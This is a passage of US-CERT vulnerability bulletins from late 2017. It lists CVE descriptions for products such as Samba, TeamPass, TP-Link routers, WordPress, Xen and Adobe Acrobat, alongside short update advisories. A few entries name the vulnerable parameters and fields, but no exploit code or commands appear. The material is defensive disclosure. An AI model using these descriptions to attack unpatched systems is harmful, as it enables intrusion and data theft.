 		PTW-WMS1 firmware version 2.000.012 allows remote attackers to execute arbitrary OS commands via unspecified vectors.2017-12-01not yet calculatedCVE-2017-10902
JVN
princeton -- ptw-wms1
 		PTW-WMS1 firmware version 2.000.012 allows remote attackers to bypass access restrictions to obtain or delete data on the disk via unspecified vectors.2017-12-01not yet calculatedCVE-2017-10900
JVN
princeton -- ptw-wms1
 		Improper authentication issue in PTW-WMS1 firmware version 2.000.012 allows remote attackers to log in to the device with root privileges and conduct arbitrary operations via unspecified vectors.2017-12-01not yet calculatedCVE-2017-10903
JVN
princeton -- ptw-wms1
 		Buffer overflow in PTW-WMS1 firmware version 2.000.012 allows remote attackers to conduct denial-of-service attacks via unspecified vectors.2017-12-01not yet calculatedCVE-2017-10901
JVN
qualitysoft -- qnd
 		Directory traversal vulnerability in QND Advance/Standard allows an attacker to read arbitrary files via a specially crafted command.2017-12-01not yet calculatedCVE-2017-10861
CONFIRM
MISC
restlet -- restlet_framework
 		Restlet Framework before 2.3.11, when using SimpleXMLProvider, allows remote attackers to access arbitrary files via an XXE attack in a REST API HTTP request. This affects use of the Jax-rs extension.2017-11-30not yet calculatedCVE-2017-14868
MISC
MISC
MISC
restlet -- restlet_framework
 		Restlet Framework before 2.3.12 allows remote attackers to access arbitrary files via a crafted REST API HTTP request that conducts an XXE attack, because only general external entities (not parameter external entities) are properly considered. This is related to XmlRepresentation, DOMRepresentation, SaxRepresentation, and JacksonRepresentation.2017-11-30not yet calculatedCVE-2017-14949
MISC
MISC
samba -- samba
 		Use-after-free vulnerability in Samba 4.x before 4.7.3 allows remote attackers to execute arbitrary code via a crafted SMB1 request.2017-11-27not yet calculatedCVE-2017-14746
BID
SECTRACK
UBUNTU
REDHAT
REDHAT
REDHAT
DEBIAN
CONFIRM
samba -- samba
 		Samba before 4.7.3 might allow remote attackers to obtain sensitive information by leveraging failure of the server to clear allocated heap memory.2017-11-27not yet calculatedCVE-2017-15275
BID
SECTRACK
UBUNTU
UBUNTU
REDHAT
REDHAT
REDHAT
DEBIAN
CONFIRM
samsung/seagate -- drives
 		Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when used on Windows and operating in Opal mode on Lenovo ThinkPad T440s laptops with BIOS 2.32 or ThinkPad W541 laptops with BIOS 2.21, or in Opal or eDrive mode on Dell Latitude E6410 laptops with BIOS A16 or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by triggering a soft reset and booting from an alternative OS, aka a "Forced Restart Attack."2017-11-27not yet calculatedCVE-2015-7268
MISC
MISC
samsung/seagate -- drives
 		Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when in sleep mode and operating in Opal or eDrive mode on Lenovo ThinkPad T440s laptops with BIOS 2.32; ThinkPad W541 laptops with BIOS 2.21; Dell Latitude E6410 laptops with BIOS A16; or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by leveraging failure to detect when SATA drives are unplugged in Sleep Mode, aka a "Hot Plug attack."2017-11-27not yet calculatedCVE-2015-7267
MISC
MISC
seagate -- st500lt015_drives
 		Seagate ST500LT015 hard disk drives, when operating in eDrive mode on Lenovo ThinkPad W541 laptops with BIOS 2.21, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by attaching a second SATA connector to exposed pins, maintaining an alternate power source, and attaching the data cable to another machine, aka a "Hot Unplug Attack."2017-11-27not yet calculatedCVE-2015-7269
MISC
MISC
sony -- media_go
 		Untrusted search path vulnerability in Media Go version 3.2.0.191 and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.2017-12-01not yet calculatedCVE-2017-10891
JVN
sony -- music_center_for_pc
 		Untrusted search path vulnerability in Music Center for PC version 1.0.00 allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.2017-12-01not yet calculatedCVE-2017-10892
JVN
splunk -- splunk_enterprise
 		Splunk Web in Splunk Enterprise 7.0.x before 7.0.0.1, 6.6.x before 6.6.3.2, 6.5.x before 6.5.6, 6.4.x before 6.4.9, and 6.3.x before 6.3.12, when the SAML authType is enabled, mishandles SAML, which allows remote attackers to bypass intended access restrictions or conduct impersonation attacks.2017-11-29not yet calculatedCVE-2017-17067
BID
CONFIRM
squiz -- matrixAn issue was discovered in Squiz Matrix before 5.3.6.1 and 5.4.x before 5.4.1.3. There are multiple reflected Cross-Site Scripting (XSS) issues in Matrix WYSIWYG plugins.2017-11-29not yet calculatedCVE-2017-14197
MISC
squiz -- matrix
 		An issue was discovered in Squiz Matrix before 5.3.6.1 and 5.4.x before 5.4.1.3. Authenticated users with permissions to edit design assets can cause Remote Code Execution (RCE) via a maliciously crafted time_format tag.2017-11-29not yet calculatedCVE-2017-14198
MISC
squiz -- matrix
 		An issue was discovered in Squiz Matrix from 5.3 through to 5.3.6.1 and 5.4.1.3. An information disclosure caused by a Path Traversal issue in the 'File Bridge' plugin allowed the existence of files outside of the bridged path to be confirmed.2017-11-29not yet calculatedCVE-2017-14196
MISC
stalker_software -- communigate_pro
 		The WebMail components (Crystal, pronto, and pronto4) in CommuniGate Pro before 6.2.1 have stored XSS vulnerabilities via (1) the location or details field of a Google Calendar invitation, (2) a crafted Outlook.com calendar (aka Hotmail Calendar) invitation, (3) e-mail granting access to a directory that has JavaScript in its name, (4) JavaScript in a note name, (5) JavaScript in a task name, or (6) HTML e-mail that is mishandled in the Inbox component.2017-11-27not yet calculatedCVE-2017-16962
MISC
EXPLOIT-DB
swagger-parser -- swagger-parser
 		A vulnerability in Swagger-Parser's version <= 1.0.30 and Swagger codegen version <= 2.2.2 yaml parsing functionality results in arbitrary code being executed when a maliciously crafted yaml Open-API specification is parsed. This in particular, affects the 'generate' and 'validate' command in swagger-codegen (<= 2.2.2) and can lead to arbitrary code being executed when these commands are used on a well-crafted yaml specification.2017-11-27not yet calculatedCVE-2017-1000207
CONFIRM
teampass -- teampassTeamPass before 2.1.27.9 does not properly enforce item access control when requesting items.queries.php. It is then possible to copy any arbitrary item into a directory controlled by the attacker, edit any item within a read-only directory, delete an arbitrary item, delete the file attachments of an arbitrary item, copy the password of an arbitrary item to the copy/paste buffer, access the history of an arbitrary item, and edit attributes of an arbitrary directory. To exploit the vulnerability, an authenticated attacker must tamper with the requests sent directly, for example by changing the "item_id" parameter when invoking "copy_item" on items.queries.php.2017-11-27not yet calculatedCVE-2017-15055
MISC
MISC
teampass -- teampass
 		TeamPass before 2.1.27.9 does not properly enforce manager access control when requesting users.queries.php. It is then possible for a manager user to delete an arbitrary user (including admin), or modify attributes of any arbitrary user except administrator. To exploit the vulnerability, an authenticated attacker must have the manager rights on the application, then tamper with the requests sent directly, for example by changing the "id" parameter when invoking "delete_user" on users.queries.php.2017-11-27not yet calculatedCVE-2017-15052
MISC
MISC
teampass -- teampass
 		An arbitrary file upload vulnerability, present in TeamPass before 2.1.27.9, allows remote authenticated users to upload arbitrary files leading to Remote Command Execution. To exploit this vulnerability, an authenticated attacker has to tamper with parameters of a request to upload.files.php, in order to select the correct branch and be able to upload any arbitrary file. From there, it can simply access the file to execute code on the server.2017-11-27not yet calculatedCVE-2017-15054
MISC
MISC
teampass -- teampass
 		TeamPass before 2.1.27.9 does not properly enforce manager access control when requesting roles.queries.php. It is then possible for a manager user to modify any arbitrary roles within the application, or delete any arbitrary role. To exploit the vulnerability, an authenticated attacker must have the manager rights on the application, then tamper with the requests sent directly, for example by changing the "id" parameter when invoking "delete_role" on roles.queries.php.2017-11-27not yet calculatedCVE-2017-15053
MISC
MISC
teampass -- teampass
 		Multiple stored cross-site scripting (XSS) vulnerabilities in TeamPass before 2.1.27.9 allow authenticated remote attackers to inject arbitrary web script or HTML via the (1) URL value of an item or (2) user log history. To exploit the vulnerability, the attacker must be first authenticated to the application. For the first one, the attacker has to simply inject XSS code within the URL field of a shared item. For the second one however, the attacker must prepare a payload within its profile, and then ask an administrator to modify its profile. From there, whenever the administrator accesses the log, it can be XSS'ed.2017-11-27not yet calculatedCVE-2017-15051
MISC
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (NULL pointer dereference) or possibly have unspecified other impact via a NULL value in a 0x82730020 DeviceIoControl request to \\.\Viragtlt.2017-11-28not yet calculatedCVE-2017-17050
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (NULL pointer dereference) or possibly have unspecified other impact via a NULL value in a 0x82730010 DeviceIoControl request to \\.\Viragtlt.2017-11-28not yet calculatedCVE-2017-17049
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (NULL pointer dereference) or possibly have unspecified other impact via a NULL value in a 0x82730008 DeviceIoControl request to \\.\Viragtlt.2017-11-26not yet calculatedCVE-2017-16948
MISC
tomoki_sanaki -- sdnsproxy.exe
 		sDNSProxy.exe ver1.1.0.0 and earlier allows remote attackers to cause a denial of service via unspecified vectors.2017-12-01not yet calculatedCVE-2017-10895
JVN
tomoki_sanaki -- streamrelay.net.exe
 		StreamRelay.NET.exe ver2.14.0.7 and earlier allows remote attackers to cause a denial of service via unspecified vectors.2017-12-01not yet calculatedCVE-2017-10894
JVN
tp-link -- multiple_devices
 		TP-Link TL-WVR, TL-WAR, TL-ER, and TL-R devices allow remote authenticated users to execute arbitrary commands via shell metacharacters in the iface field of an admin/diagnostic command to cgi-bin/luci, related to the zone_get_effect_devices function in /usr/lib/lua/luci/controller/admin/diagnostic.lua in uhttpd.2017-11-27not yet calculatedCVE-2017-16957
BID
MISC
tp-link -- multiple_devices
 		TP-Link TL-WVR, TL-WAR, TL-ER, and TL-R devices allow remote authenticated users to execute arbitrary commands via shell metacharacters in the t_bindif field of an admin/interface command to cgi-bin/luci, related to the get_device_byif function in /usr/lib/lua/luci/controller/admin/interface.lua in uhttpd.2017-11-27not yet calculatedCVE-2017-16960
MISC
tp-link -- multiple_devices
 		The locale feature in cgi-bin/luci on TP-Link TL-WVR, TL-WAR, TL-ER, and TL-R devices allows remote authenticated users to test for the existence of arbitrary files by making an operation=write;locale=%0d request, and then making an operation=read request with a crafted Accept-Language HTTP header, related to the set_sysinfo and get_sysinfo functions in /usr/lib/lua/luci/controller/locale.lua in uhttpd.2017-11-27not yet calculatedCVE-2017-16959
MISC
tp-link -- multiple_devices
 		TP-Link TL-WVR, TL-WAR, TL-ER, and TL-R devices allow remote authenticated users to execute arbitrary commands via shell metacharacters in the t_bindif field of an admin/bridge command to cgi-bin/luci, related to the get_device_byif function in /usr/lib/lua/luci/controller/admin/bridge.lua in uhttpd.2017-11-27not yet calculatedCVE-2017-16958
MISC
vibease -- multiple_products
 		The Vibease Wireless Remote Vibrator app for Android and the Vibease Chat app for iOS use cleartext to exchange messages with other apps and the PLAIN SASL mechanism to send auth tokens to Vibease servers, which allows remote attackers to obtain user credentials, messages, and other sensitive information by sniffing the network for XMPP traffic.2017-12-01not yet calculatedCVE-2017-14486
MISC
vim -- vim
 		fileio.c in Vim prior to 8.0.1263 sets the group ownership of a .swp file to the editor's primary group (which may be different from the group ownership of the original file), which allows local users to obtain sensitive information by leveraging an applicable group membership, as demonstrated by /etc/shadow owned by root:shadow mode 0640, but /etc/.shadow.swp owned by root:users mode 0640, a different vulnerability than CVE-2017-1000382.2017-12-01not yet calculatedCVE-2017-17087
MISC
MISC
MISC
MISC
winamp -- winamp_pro
 		Winamp Pro 5.66 Build 3512 allows remote attackers to cause a denial of service via a crafted WAV, WMV, AU, ASF, AIFF, or AIF file.2017-11-28not yet calculatedCVE-2017-16951
EXPLOIT-DB
wireshark -- wireshark
 		In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the NetBIOS dissector could crash. This was addressed in epan/dissectors/packet-netbios.c by ensuring that write operations are bounded by the beginning of a buffer.2017-12-01not yet calculatedCVE-2017-17083
CONFIRM
CONFIRM
CONFIRM
wireshark -- wireshark
 		In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the IWARP_MPA dissector could crash. This was addressed in epan/dissectors/packet-iwarp-mpa.c by validating a ULPDU length.2017-12-01not yet calculatedCVE-2017-17084
CONFIRM
CONFIRM
CONFIRM
wireshark -- wireshark
 		In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the CIP Safety dissector could crash. This was addressed in epan/dissectors/packet-cipsafety.c by validating the packet length.2017-12-01not yet calculatedCVE-2017-17085
CONFIRM
CONFIRM
CONFIRM
wordpress -- wordpresswp-admin/user-new.php in WordPress before 4.9.1 sets the newbloguser key to a string that can be directly derived from the user ID, which allows remote attackers to bypass intended access restrictions by entering this string.2017-12-02not yet calculatedCVE-2017-17091
MISC
MISC
MISC
wordpress -- wordpress
 		XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.2017-11-29not yet calculatedCVE-2017-17059
MISC
MISC
wordpress -- wordpress
 		wp-includes/feed.php in WordPress before 4.9.1 does not properly restrict enclosures in RSS and Atom fields, which might allow attackers to conduct XSS attacks via a crafted URL.2017-12-02not yet calculatedCVE-2017-17094
MISC
MISC
MISC
wordpress -- wordpress
 		The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.2017-11-28not yet calculatedCVE-2017-17043
MISC
MISC
MISC
wordpress -- wordpress
 		The WooCommerce plugin through 3.x for WordPress has a Directory Traversal Vulnerability via a /wp-content/plugins/woocommerce/templates/emails/plain/ URI, which accesses a parent directory.2017-11-29not yet calculatedCVE-2017-17058
EXPLOIT-DB
MISC
wordpress -- wordpress

 		wp-includes/functions.php in WordPress before 4.9.1 does not require the unfiltered_html capability for upload of .js files, which might allow remote attackers to conduct XSS attacks via a crafted file.2017-12-02not yet calculatedCVE-2017-17092
MISC
MISC
MISC
wordpress -- wordpress

 		wp-includes/general-template.php in WordPress before 4.9.1 does not properly restrict the lang attribute of an HTML element, which might allow attackers to conduct XSS attacks via the language setting of a site.2017-12-02not yet calculatedCVE-2017-17093
MISC
MISC
MISC
wordpress -- wordpress
 		SQL injection vulnerability in the InLinks plugin through 1.1 for WordPress allows authenticated users to execute arbitrary SQL commands via the "keyword" parameter to /wp-admin/options-general.php?page=inlinks/inlinks.php.2017-11-27not yet calculatedCVE-2017-16955
MISC
MISC
xen_project -- xenAn issue was discovered in Xen through 4.9.x allowing HVM guest OS users to gain privileges on the host OS, obtain sensitive information, or cause a denial of service (BUG and host OS crash) by leveraging the mishandling of Populate on Demand (PoD) Physical-to-Machine (P2M) errors.2017-11-28not yet calculatedCVE-2017-17045
BID
SECTRACK
CONFIRM
CONFIRM
xen_project -- xen
 		An issue was discovered in Xen through 4.9.x on the ARM platform allowing guest OS users to obtain sensitive information from DRAM after a reboot, because disjoint blocks, and physical addresses that do not start at zero, are mishandled.2017-11-28not yet calculatedCVE-2017-17046
CONFIRM
xen_project -- xen
 		An issue was discovered in Xen through 4.9.x allowing HVM guest OS users to cause a denial of service (infinite loop and host OS hang) by leveraging the mishandling of Populate on Demand (PoD) errors.2017-11-28not yet calculatedCVE-2017-17044
BID
SECTRACK
CONFIRM
CONFIRM
xiphux -- gitphp
 		GitPHP by xiphux is vulnerable to OS Command Injections2017-11-27not yet calculatedCVE-2017-1000214
CONFIRM
CONFIRM
yard -- yard
 		lib/yard/core_ext/file.rb in the server in YARD before 0.9.11 does not block relative paths with an initial ../ sequence, which allows attackers to conduct directory traversal attacks and read arbitrary files.2017-11-28not yet calculatedCVE-2017-17042
CONFIRM
zte_corporation -- zxdsl_831cii_devices
 		connoppp.cgi on ZTE ZXDSL 831CII devices does not require HTTP Basic Authentication, which allows remote attackers to modify the PPPoE configuration or set up a malicious configuration via a GET request.2017-12-01not yet calculatedCVE-2017-16953
MISC
EXPLOIT-DB
zulip -- server
 		In Zulip Server before 1.7.1, on a server with multiple realms, a vulnerability in the invitation system lets an authorized user of one realm on the server create a user account on any other realm.2017-11-27not yet calculatedCVE-2017-0910
CONFIRM
CONFIRM
Back to top

This product is provided subject to this Notification and this Privacy & Use policy.


Apache Software Foundation Releases Security Updates

December 4, 2017, 3:18 pm
$
0
0
Original release date: December 04, 2017

The Apache Software Foundation has released security updates to address vulnerabilities in Apache Struts versions 2.5 to 2.5.14. A remote attacker could exploit one of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review Apache Security Bulletins S2-054 and S2-055 and upgrade to Struts 2.5.14.1.

This product is provided subject to this Notification and this Privacy & Use policy.


Mozilla Releases Security Update for Firefox

December 4, 2017, 4:32 pm
$
0
0
Original release date: December 04, 2017

Mozilla has released a security update to address multiple vulnerabilities in Firefox 57. A remote attacker could exploit these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review the Mozilla Security Advisory for Firefox 57.0.1 and apply the necessary update.

This product is provided subject to this Notification and this Privacy & Use policy.


Securing Mobile Devices During Holiday Travel

December 5, 2017, 1:12 pm
$
0
0
Original release date: December 05, 2017

As the holiday season begins, many people will travel with their mobile devices. Although these devices—such as smart phones, tablets, and laptops—offer a range of conveniences, users should be mindful of potential threats and vulnerabilities while traveling with them.

US-CERT encourages users to review the US-CERT Tips on Holiday Traveling with Personal Internet-Enabled Devices and Cybersecurity for Electronic Devices. The suggested security practices in these tips will help travelers secure their portable devices during the holiday season and throughout the year.

This product is provided subject to this Notification and this Privacy & Use policy.


Google Releases Security Update for Chrome

December 6, 2017, 2:08 pm
$
0
0
Original release date: December 06, 2017

Google has released Chrome version 63.0.3239.84 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

US-CERT encourages users and administrators to review the Chrome Releases page and apply the necessary update.

This product is provided subject to this Notification and this Privacy & Use policy.


Apple Releases Security Updates

December 6, 2017, 2:15 pm
$
0
0
Original release date: December 06, 2017

Apple has released security updates to address vulnerabilities in multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review Apple security pages for the following products and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.


Microsoft Releases Security Updates for its Malware Protection Engine

December 7, 2017, 2:52 pm
$
0
0
Original release date: December 07, 2017

Microsoft has released updates to address a vulnerability in Microsoft Malware Protection Engine affecting multiple products. A remote attacker could exploit this vulnerability to take control of an affected system.

US-CERT encourages users and administrators to review Microsoft's Advisory and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.


Search

Mozilla Releases Security Updates

December 7, 2017, 3:50 pm
$
0
0
Original release date: December 07, 2017

Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR. A remote attacker could exploit these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review the Mozilla Security Advisory for Firefox 57.0.2 and ESR 52.5.2 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.


SB17-345: Vulnerability Summary for the Week of December 4, 2017

December 10, 2017, 9:35 pm
$
0
0
Original release date: December 11, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

 

High Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
There were no high vulnerabilities recorded this week.
Back to top

 

Medium Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
There were no medium vulnerabilities recorded this week.
Back to top

 

Low Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
There were no low vulnerabilities recorded this week.
Back to top

 

Severity Not Yet Assigned

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16382
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the printing functionality. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space.2017-12-09not yet calculatedCVE-2017-16391
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the JPEG 2000 module. An invalid JPEG 2000 input code stream leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-09not yet calculatedCVE-2017-16374
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the XPS to PDF conversion module, when processing TIFF files. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-09not yet calculatedCVE-2017-16413
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16393
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The issue is a stack exhaustion problem within the JavaScript API, where the computation does not correctly control the amount of recursion that can happen with respect to system resources.2017-12-09not yet calculatedCVE-2017-16419
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine API. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16390
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the WebCapture module, related to an internal hash table implementation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16411
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript API engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16388
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of Acrobat's page display functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16405
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript API module responsible for form field computation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16414
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value when processing TIFF files embedded within an XPS document. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16381
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a heap overflow vulnerability when processing a JPEG file embedded within an XPS document.2017-12-09not yet calculatedCVE-2017-16383
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the exif processing module for a PNG file (during XPS conversion). Invalid input leads to a computation where pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-09not yet calculatedCVE-2017-16384
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability in the graphics rendering engine.2017-12-09not yet calculatedCVE-2017-16379
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference when handling number format dictionary entries. In this scenario, the input is crafted in way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16364
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability for a certain file-type extension. Acrobat maintains both a blacklist and whitelist (the user can specify an allowed attachment). However, any file extensions that are neither on the blacklist nor the whitelist can still be opened after displaying a warning prompt.2017-12-09not yet calculatedCVE-2017-16380
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the module that handles character codes for certain textual representations. Invalid input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-09not yet calculatedCVE-2017-16363
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the MakeAccessible plugin. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16376
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
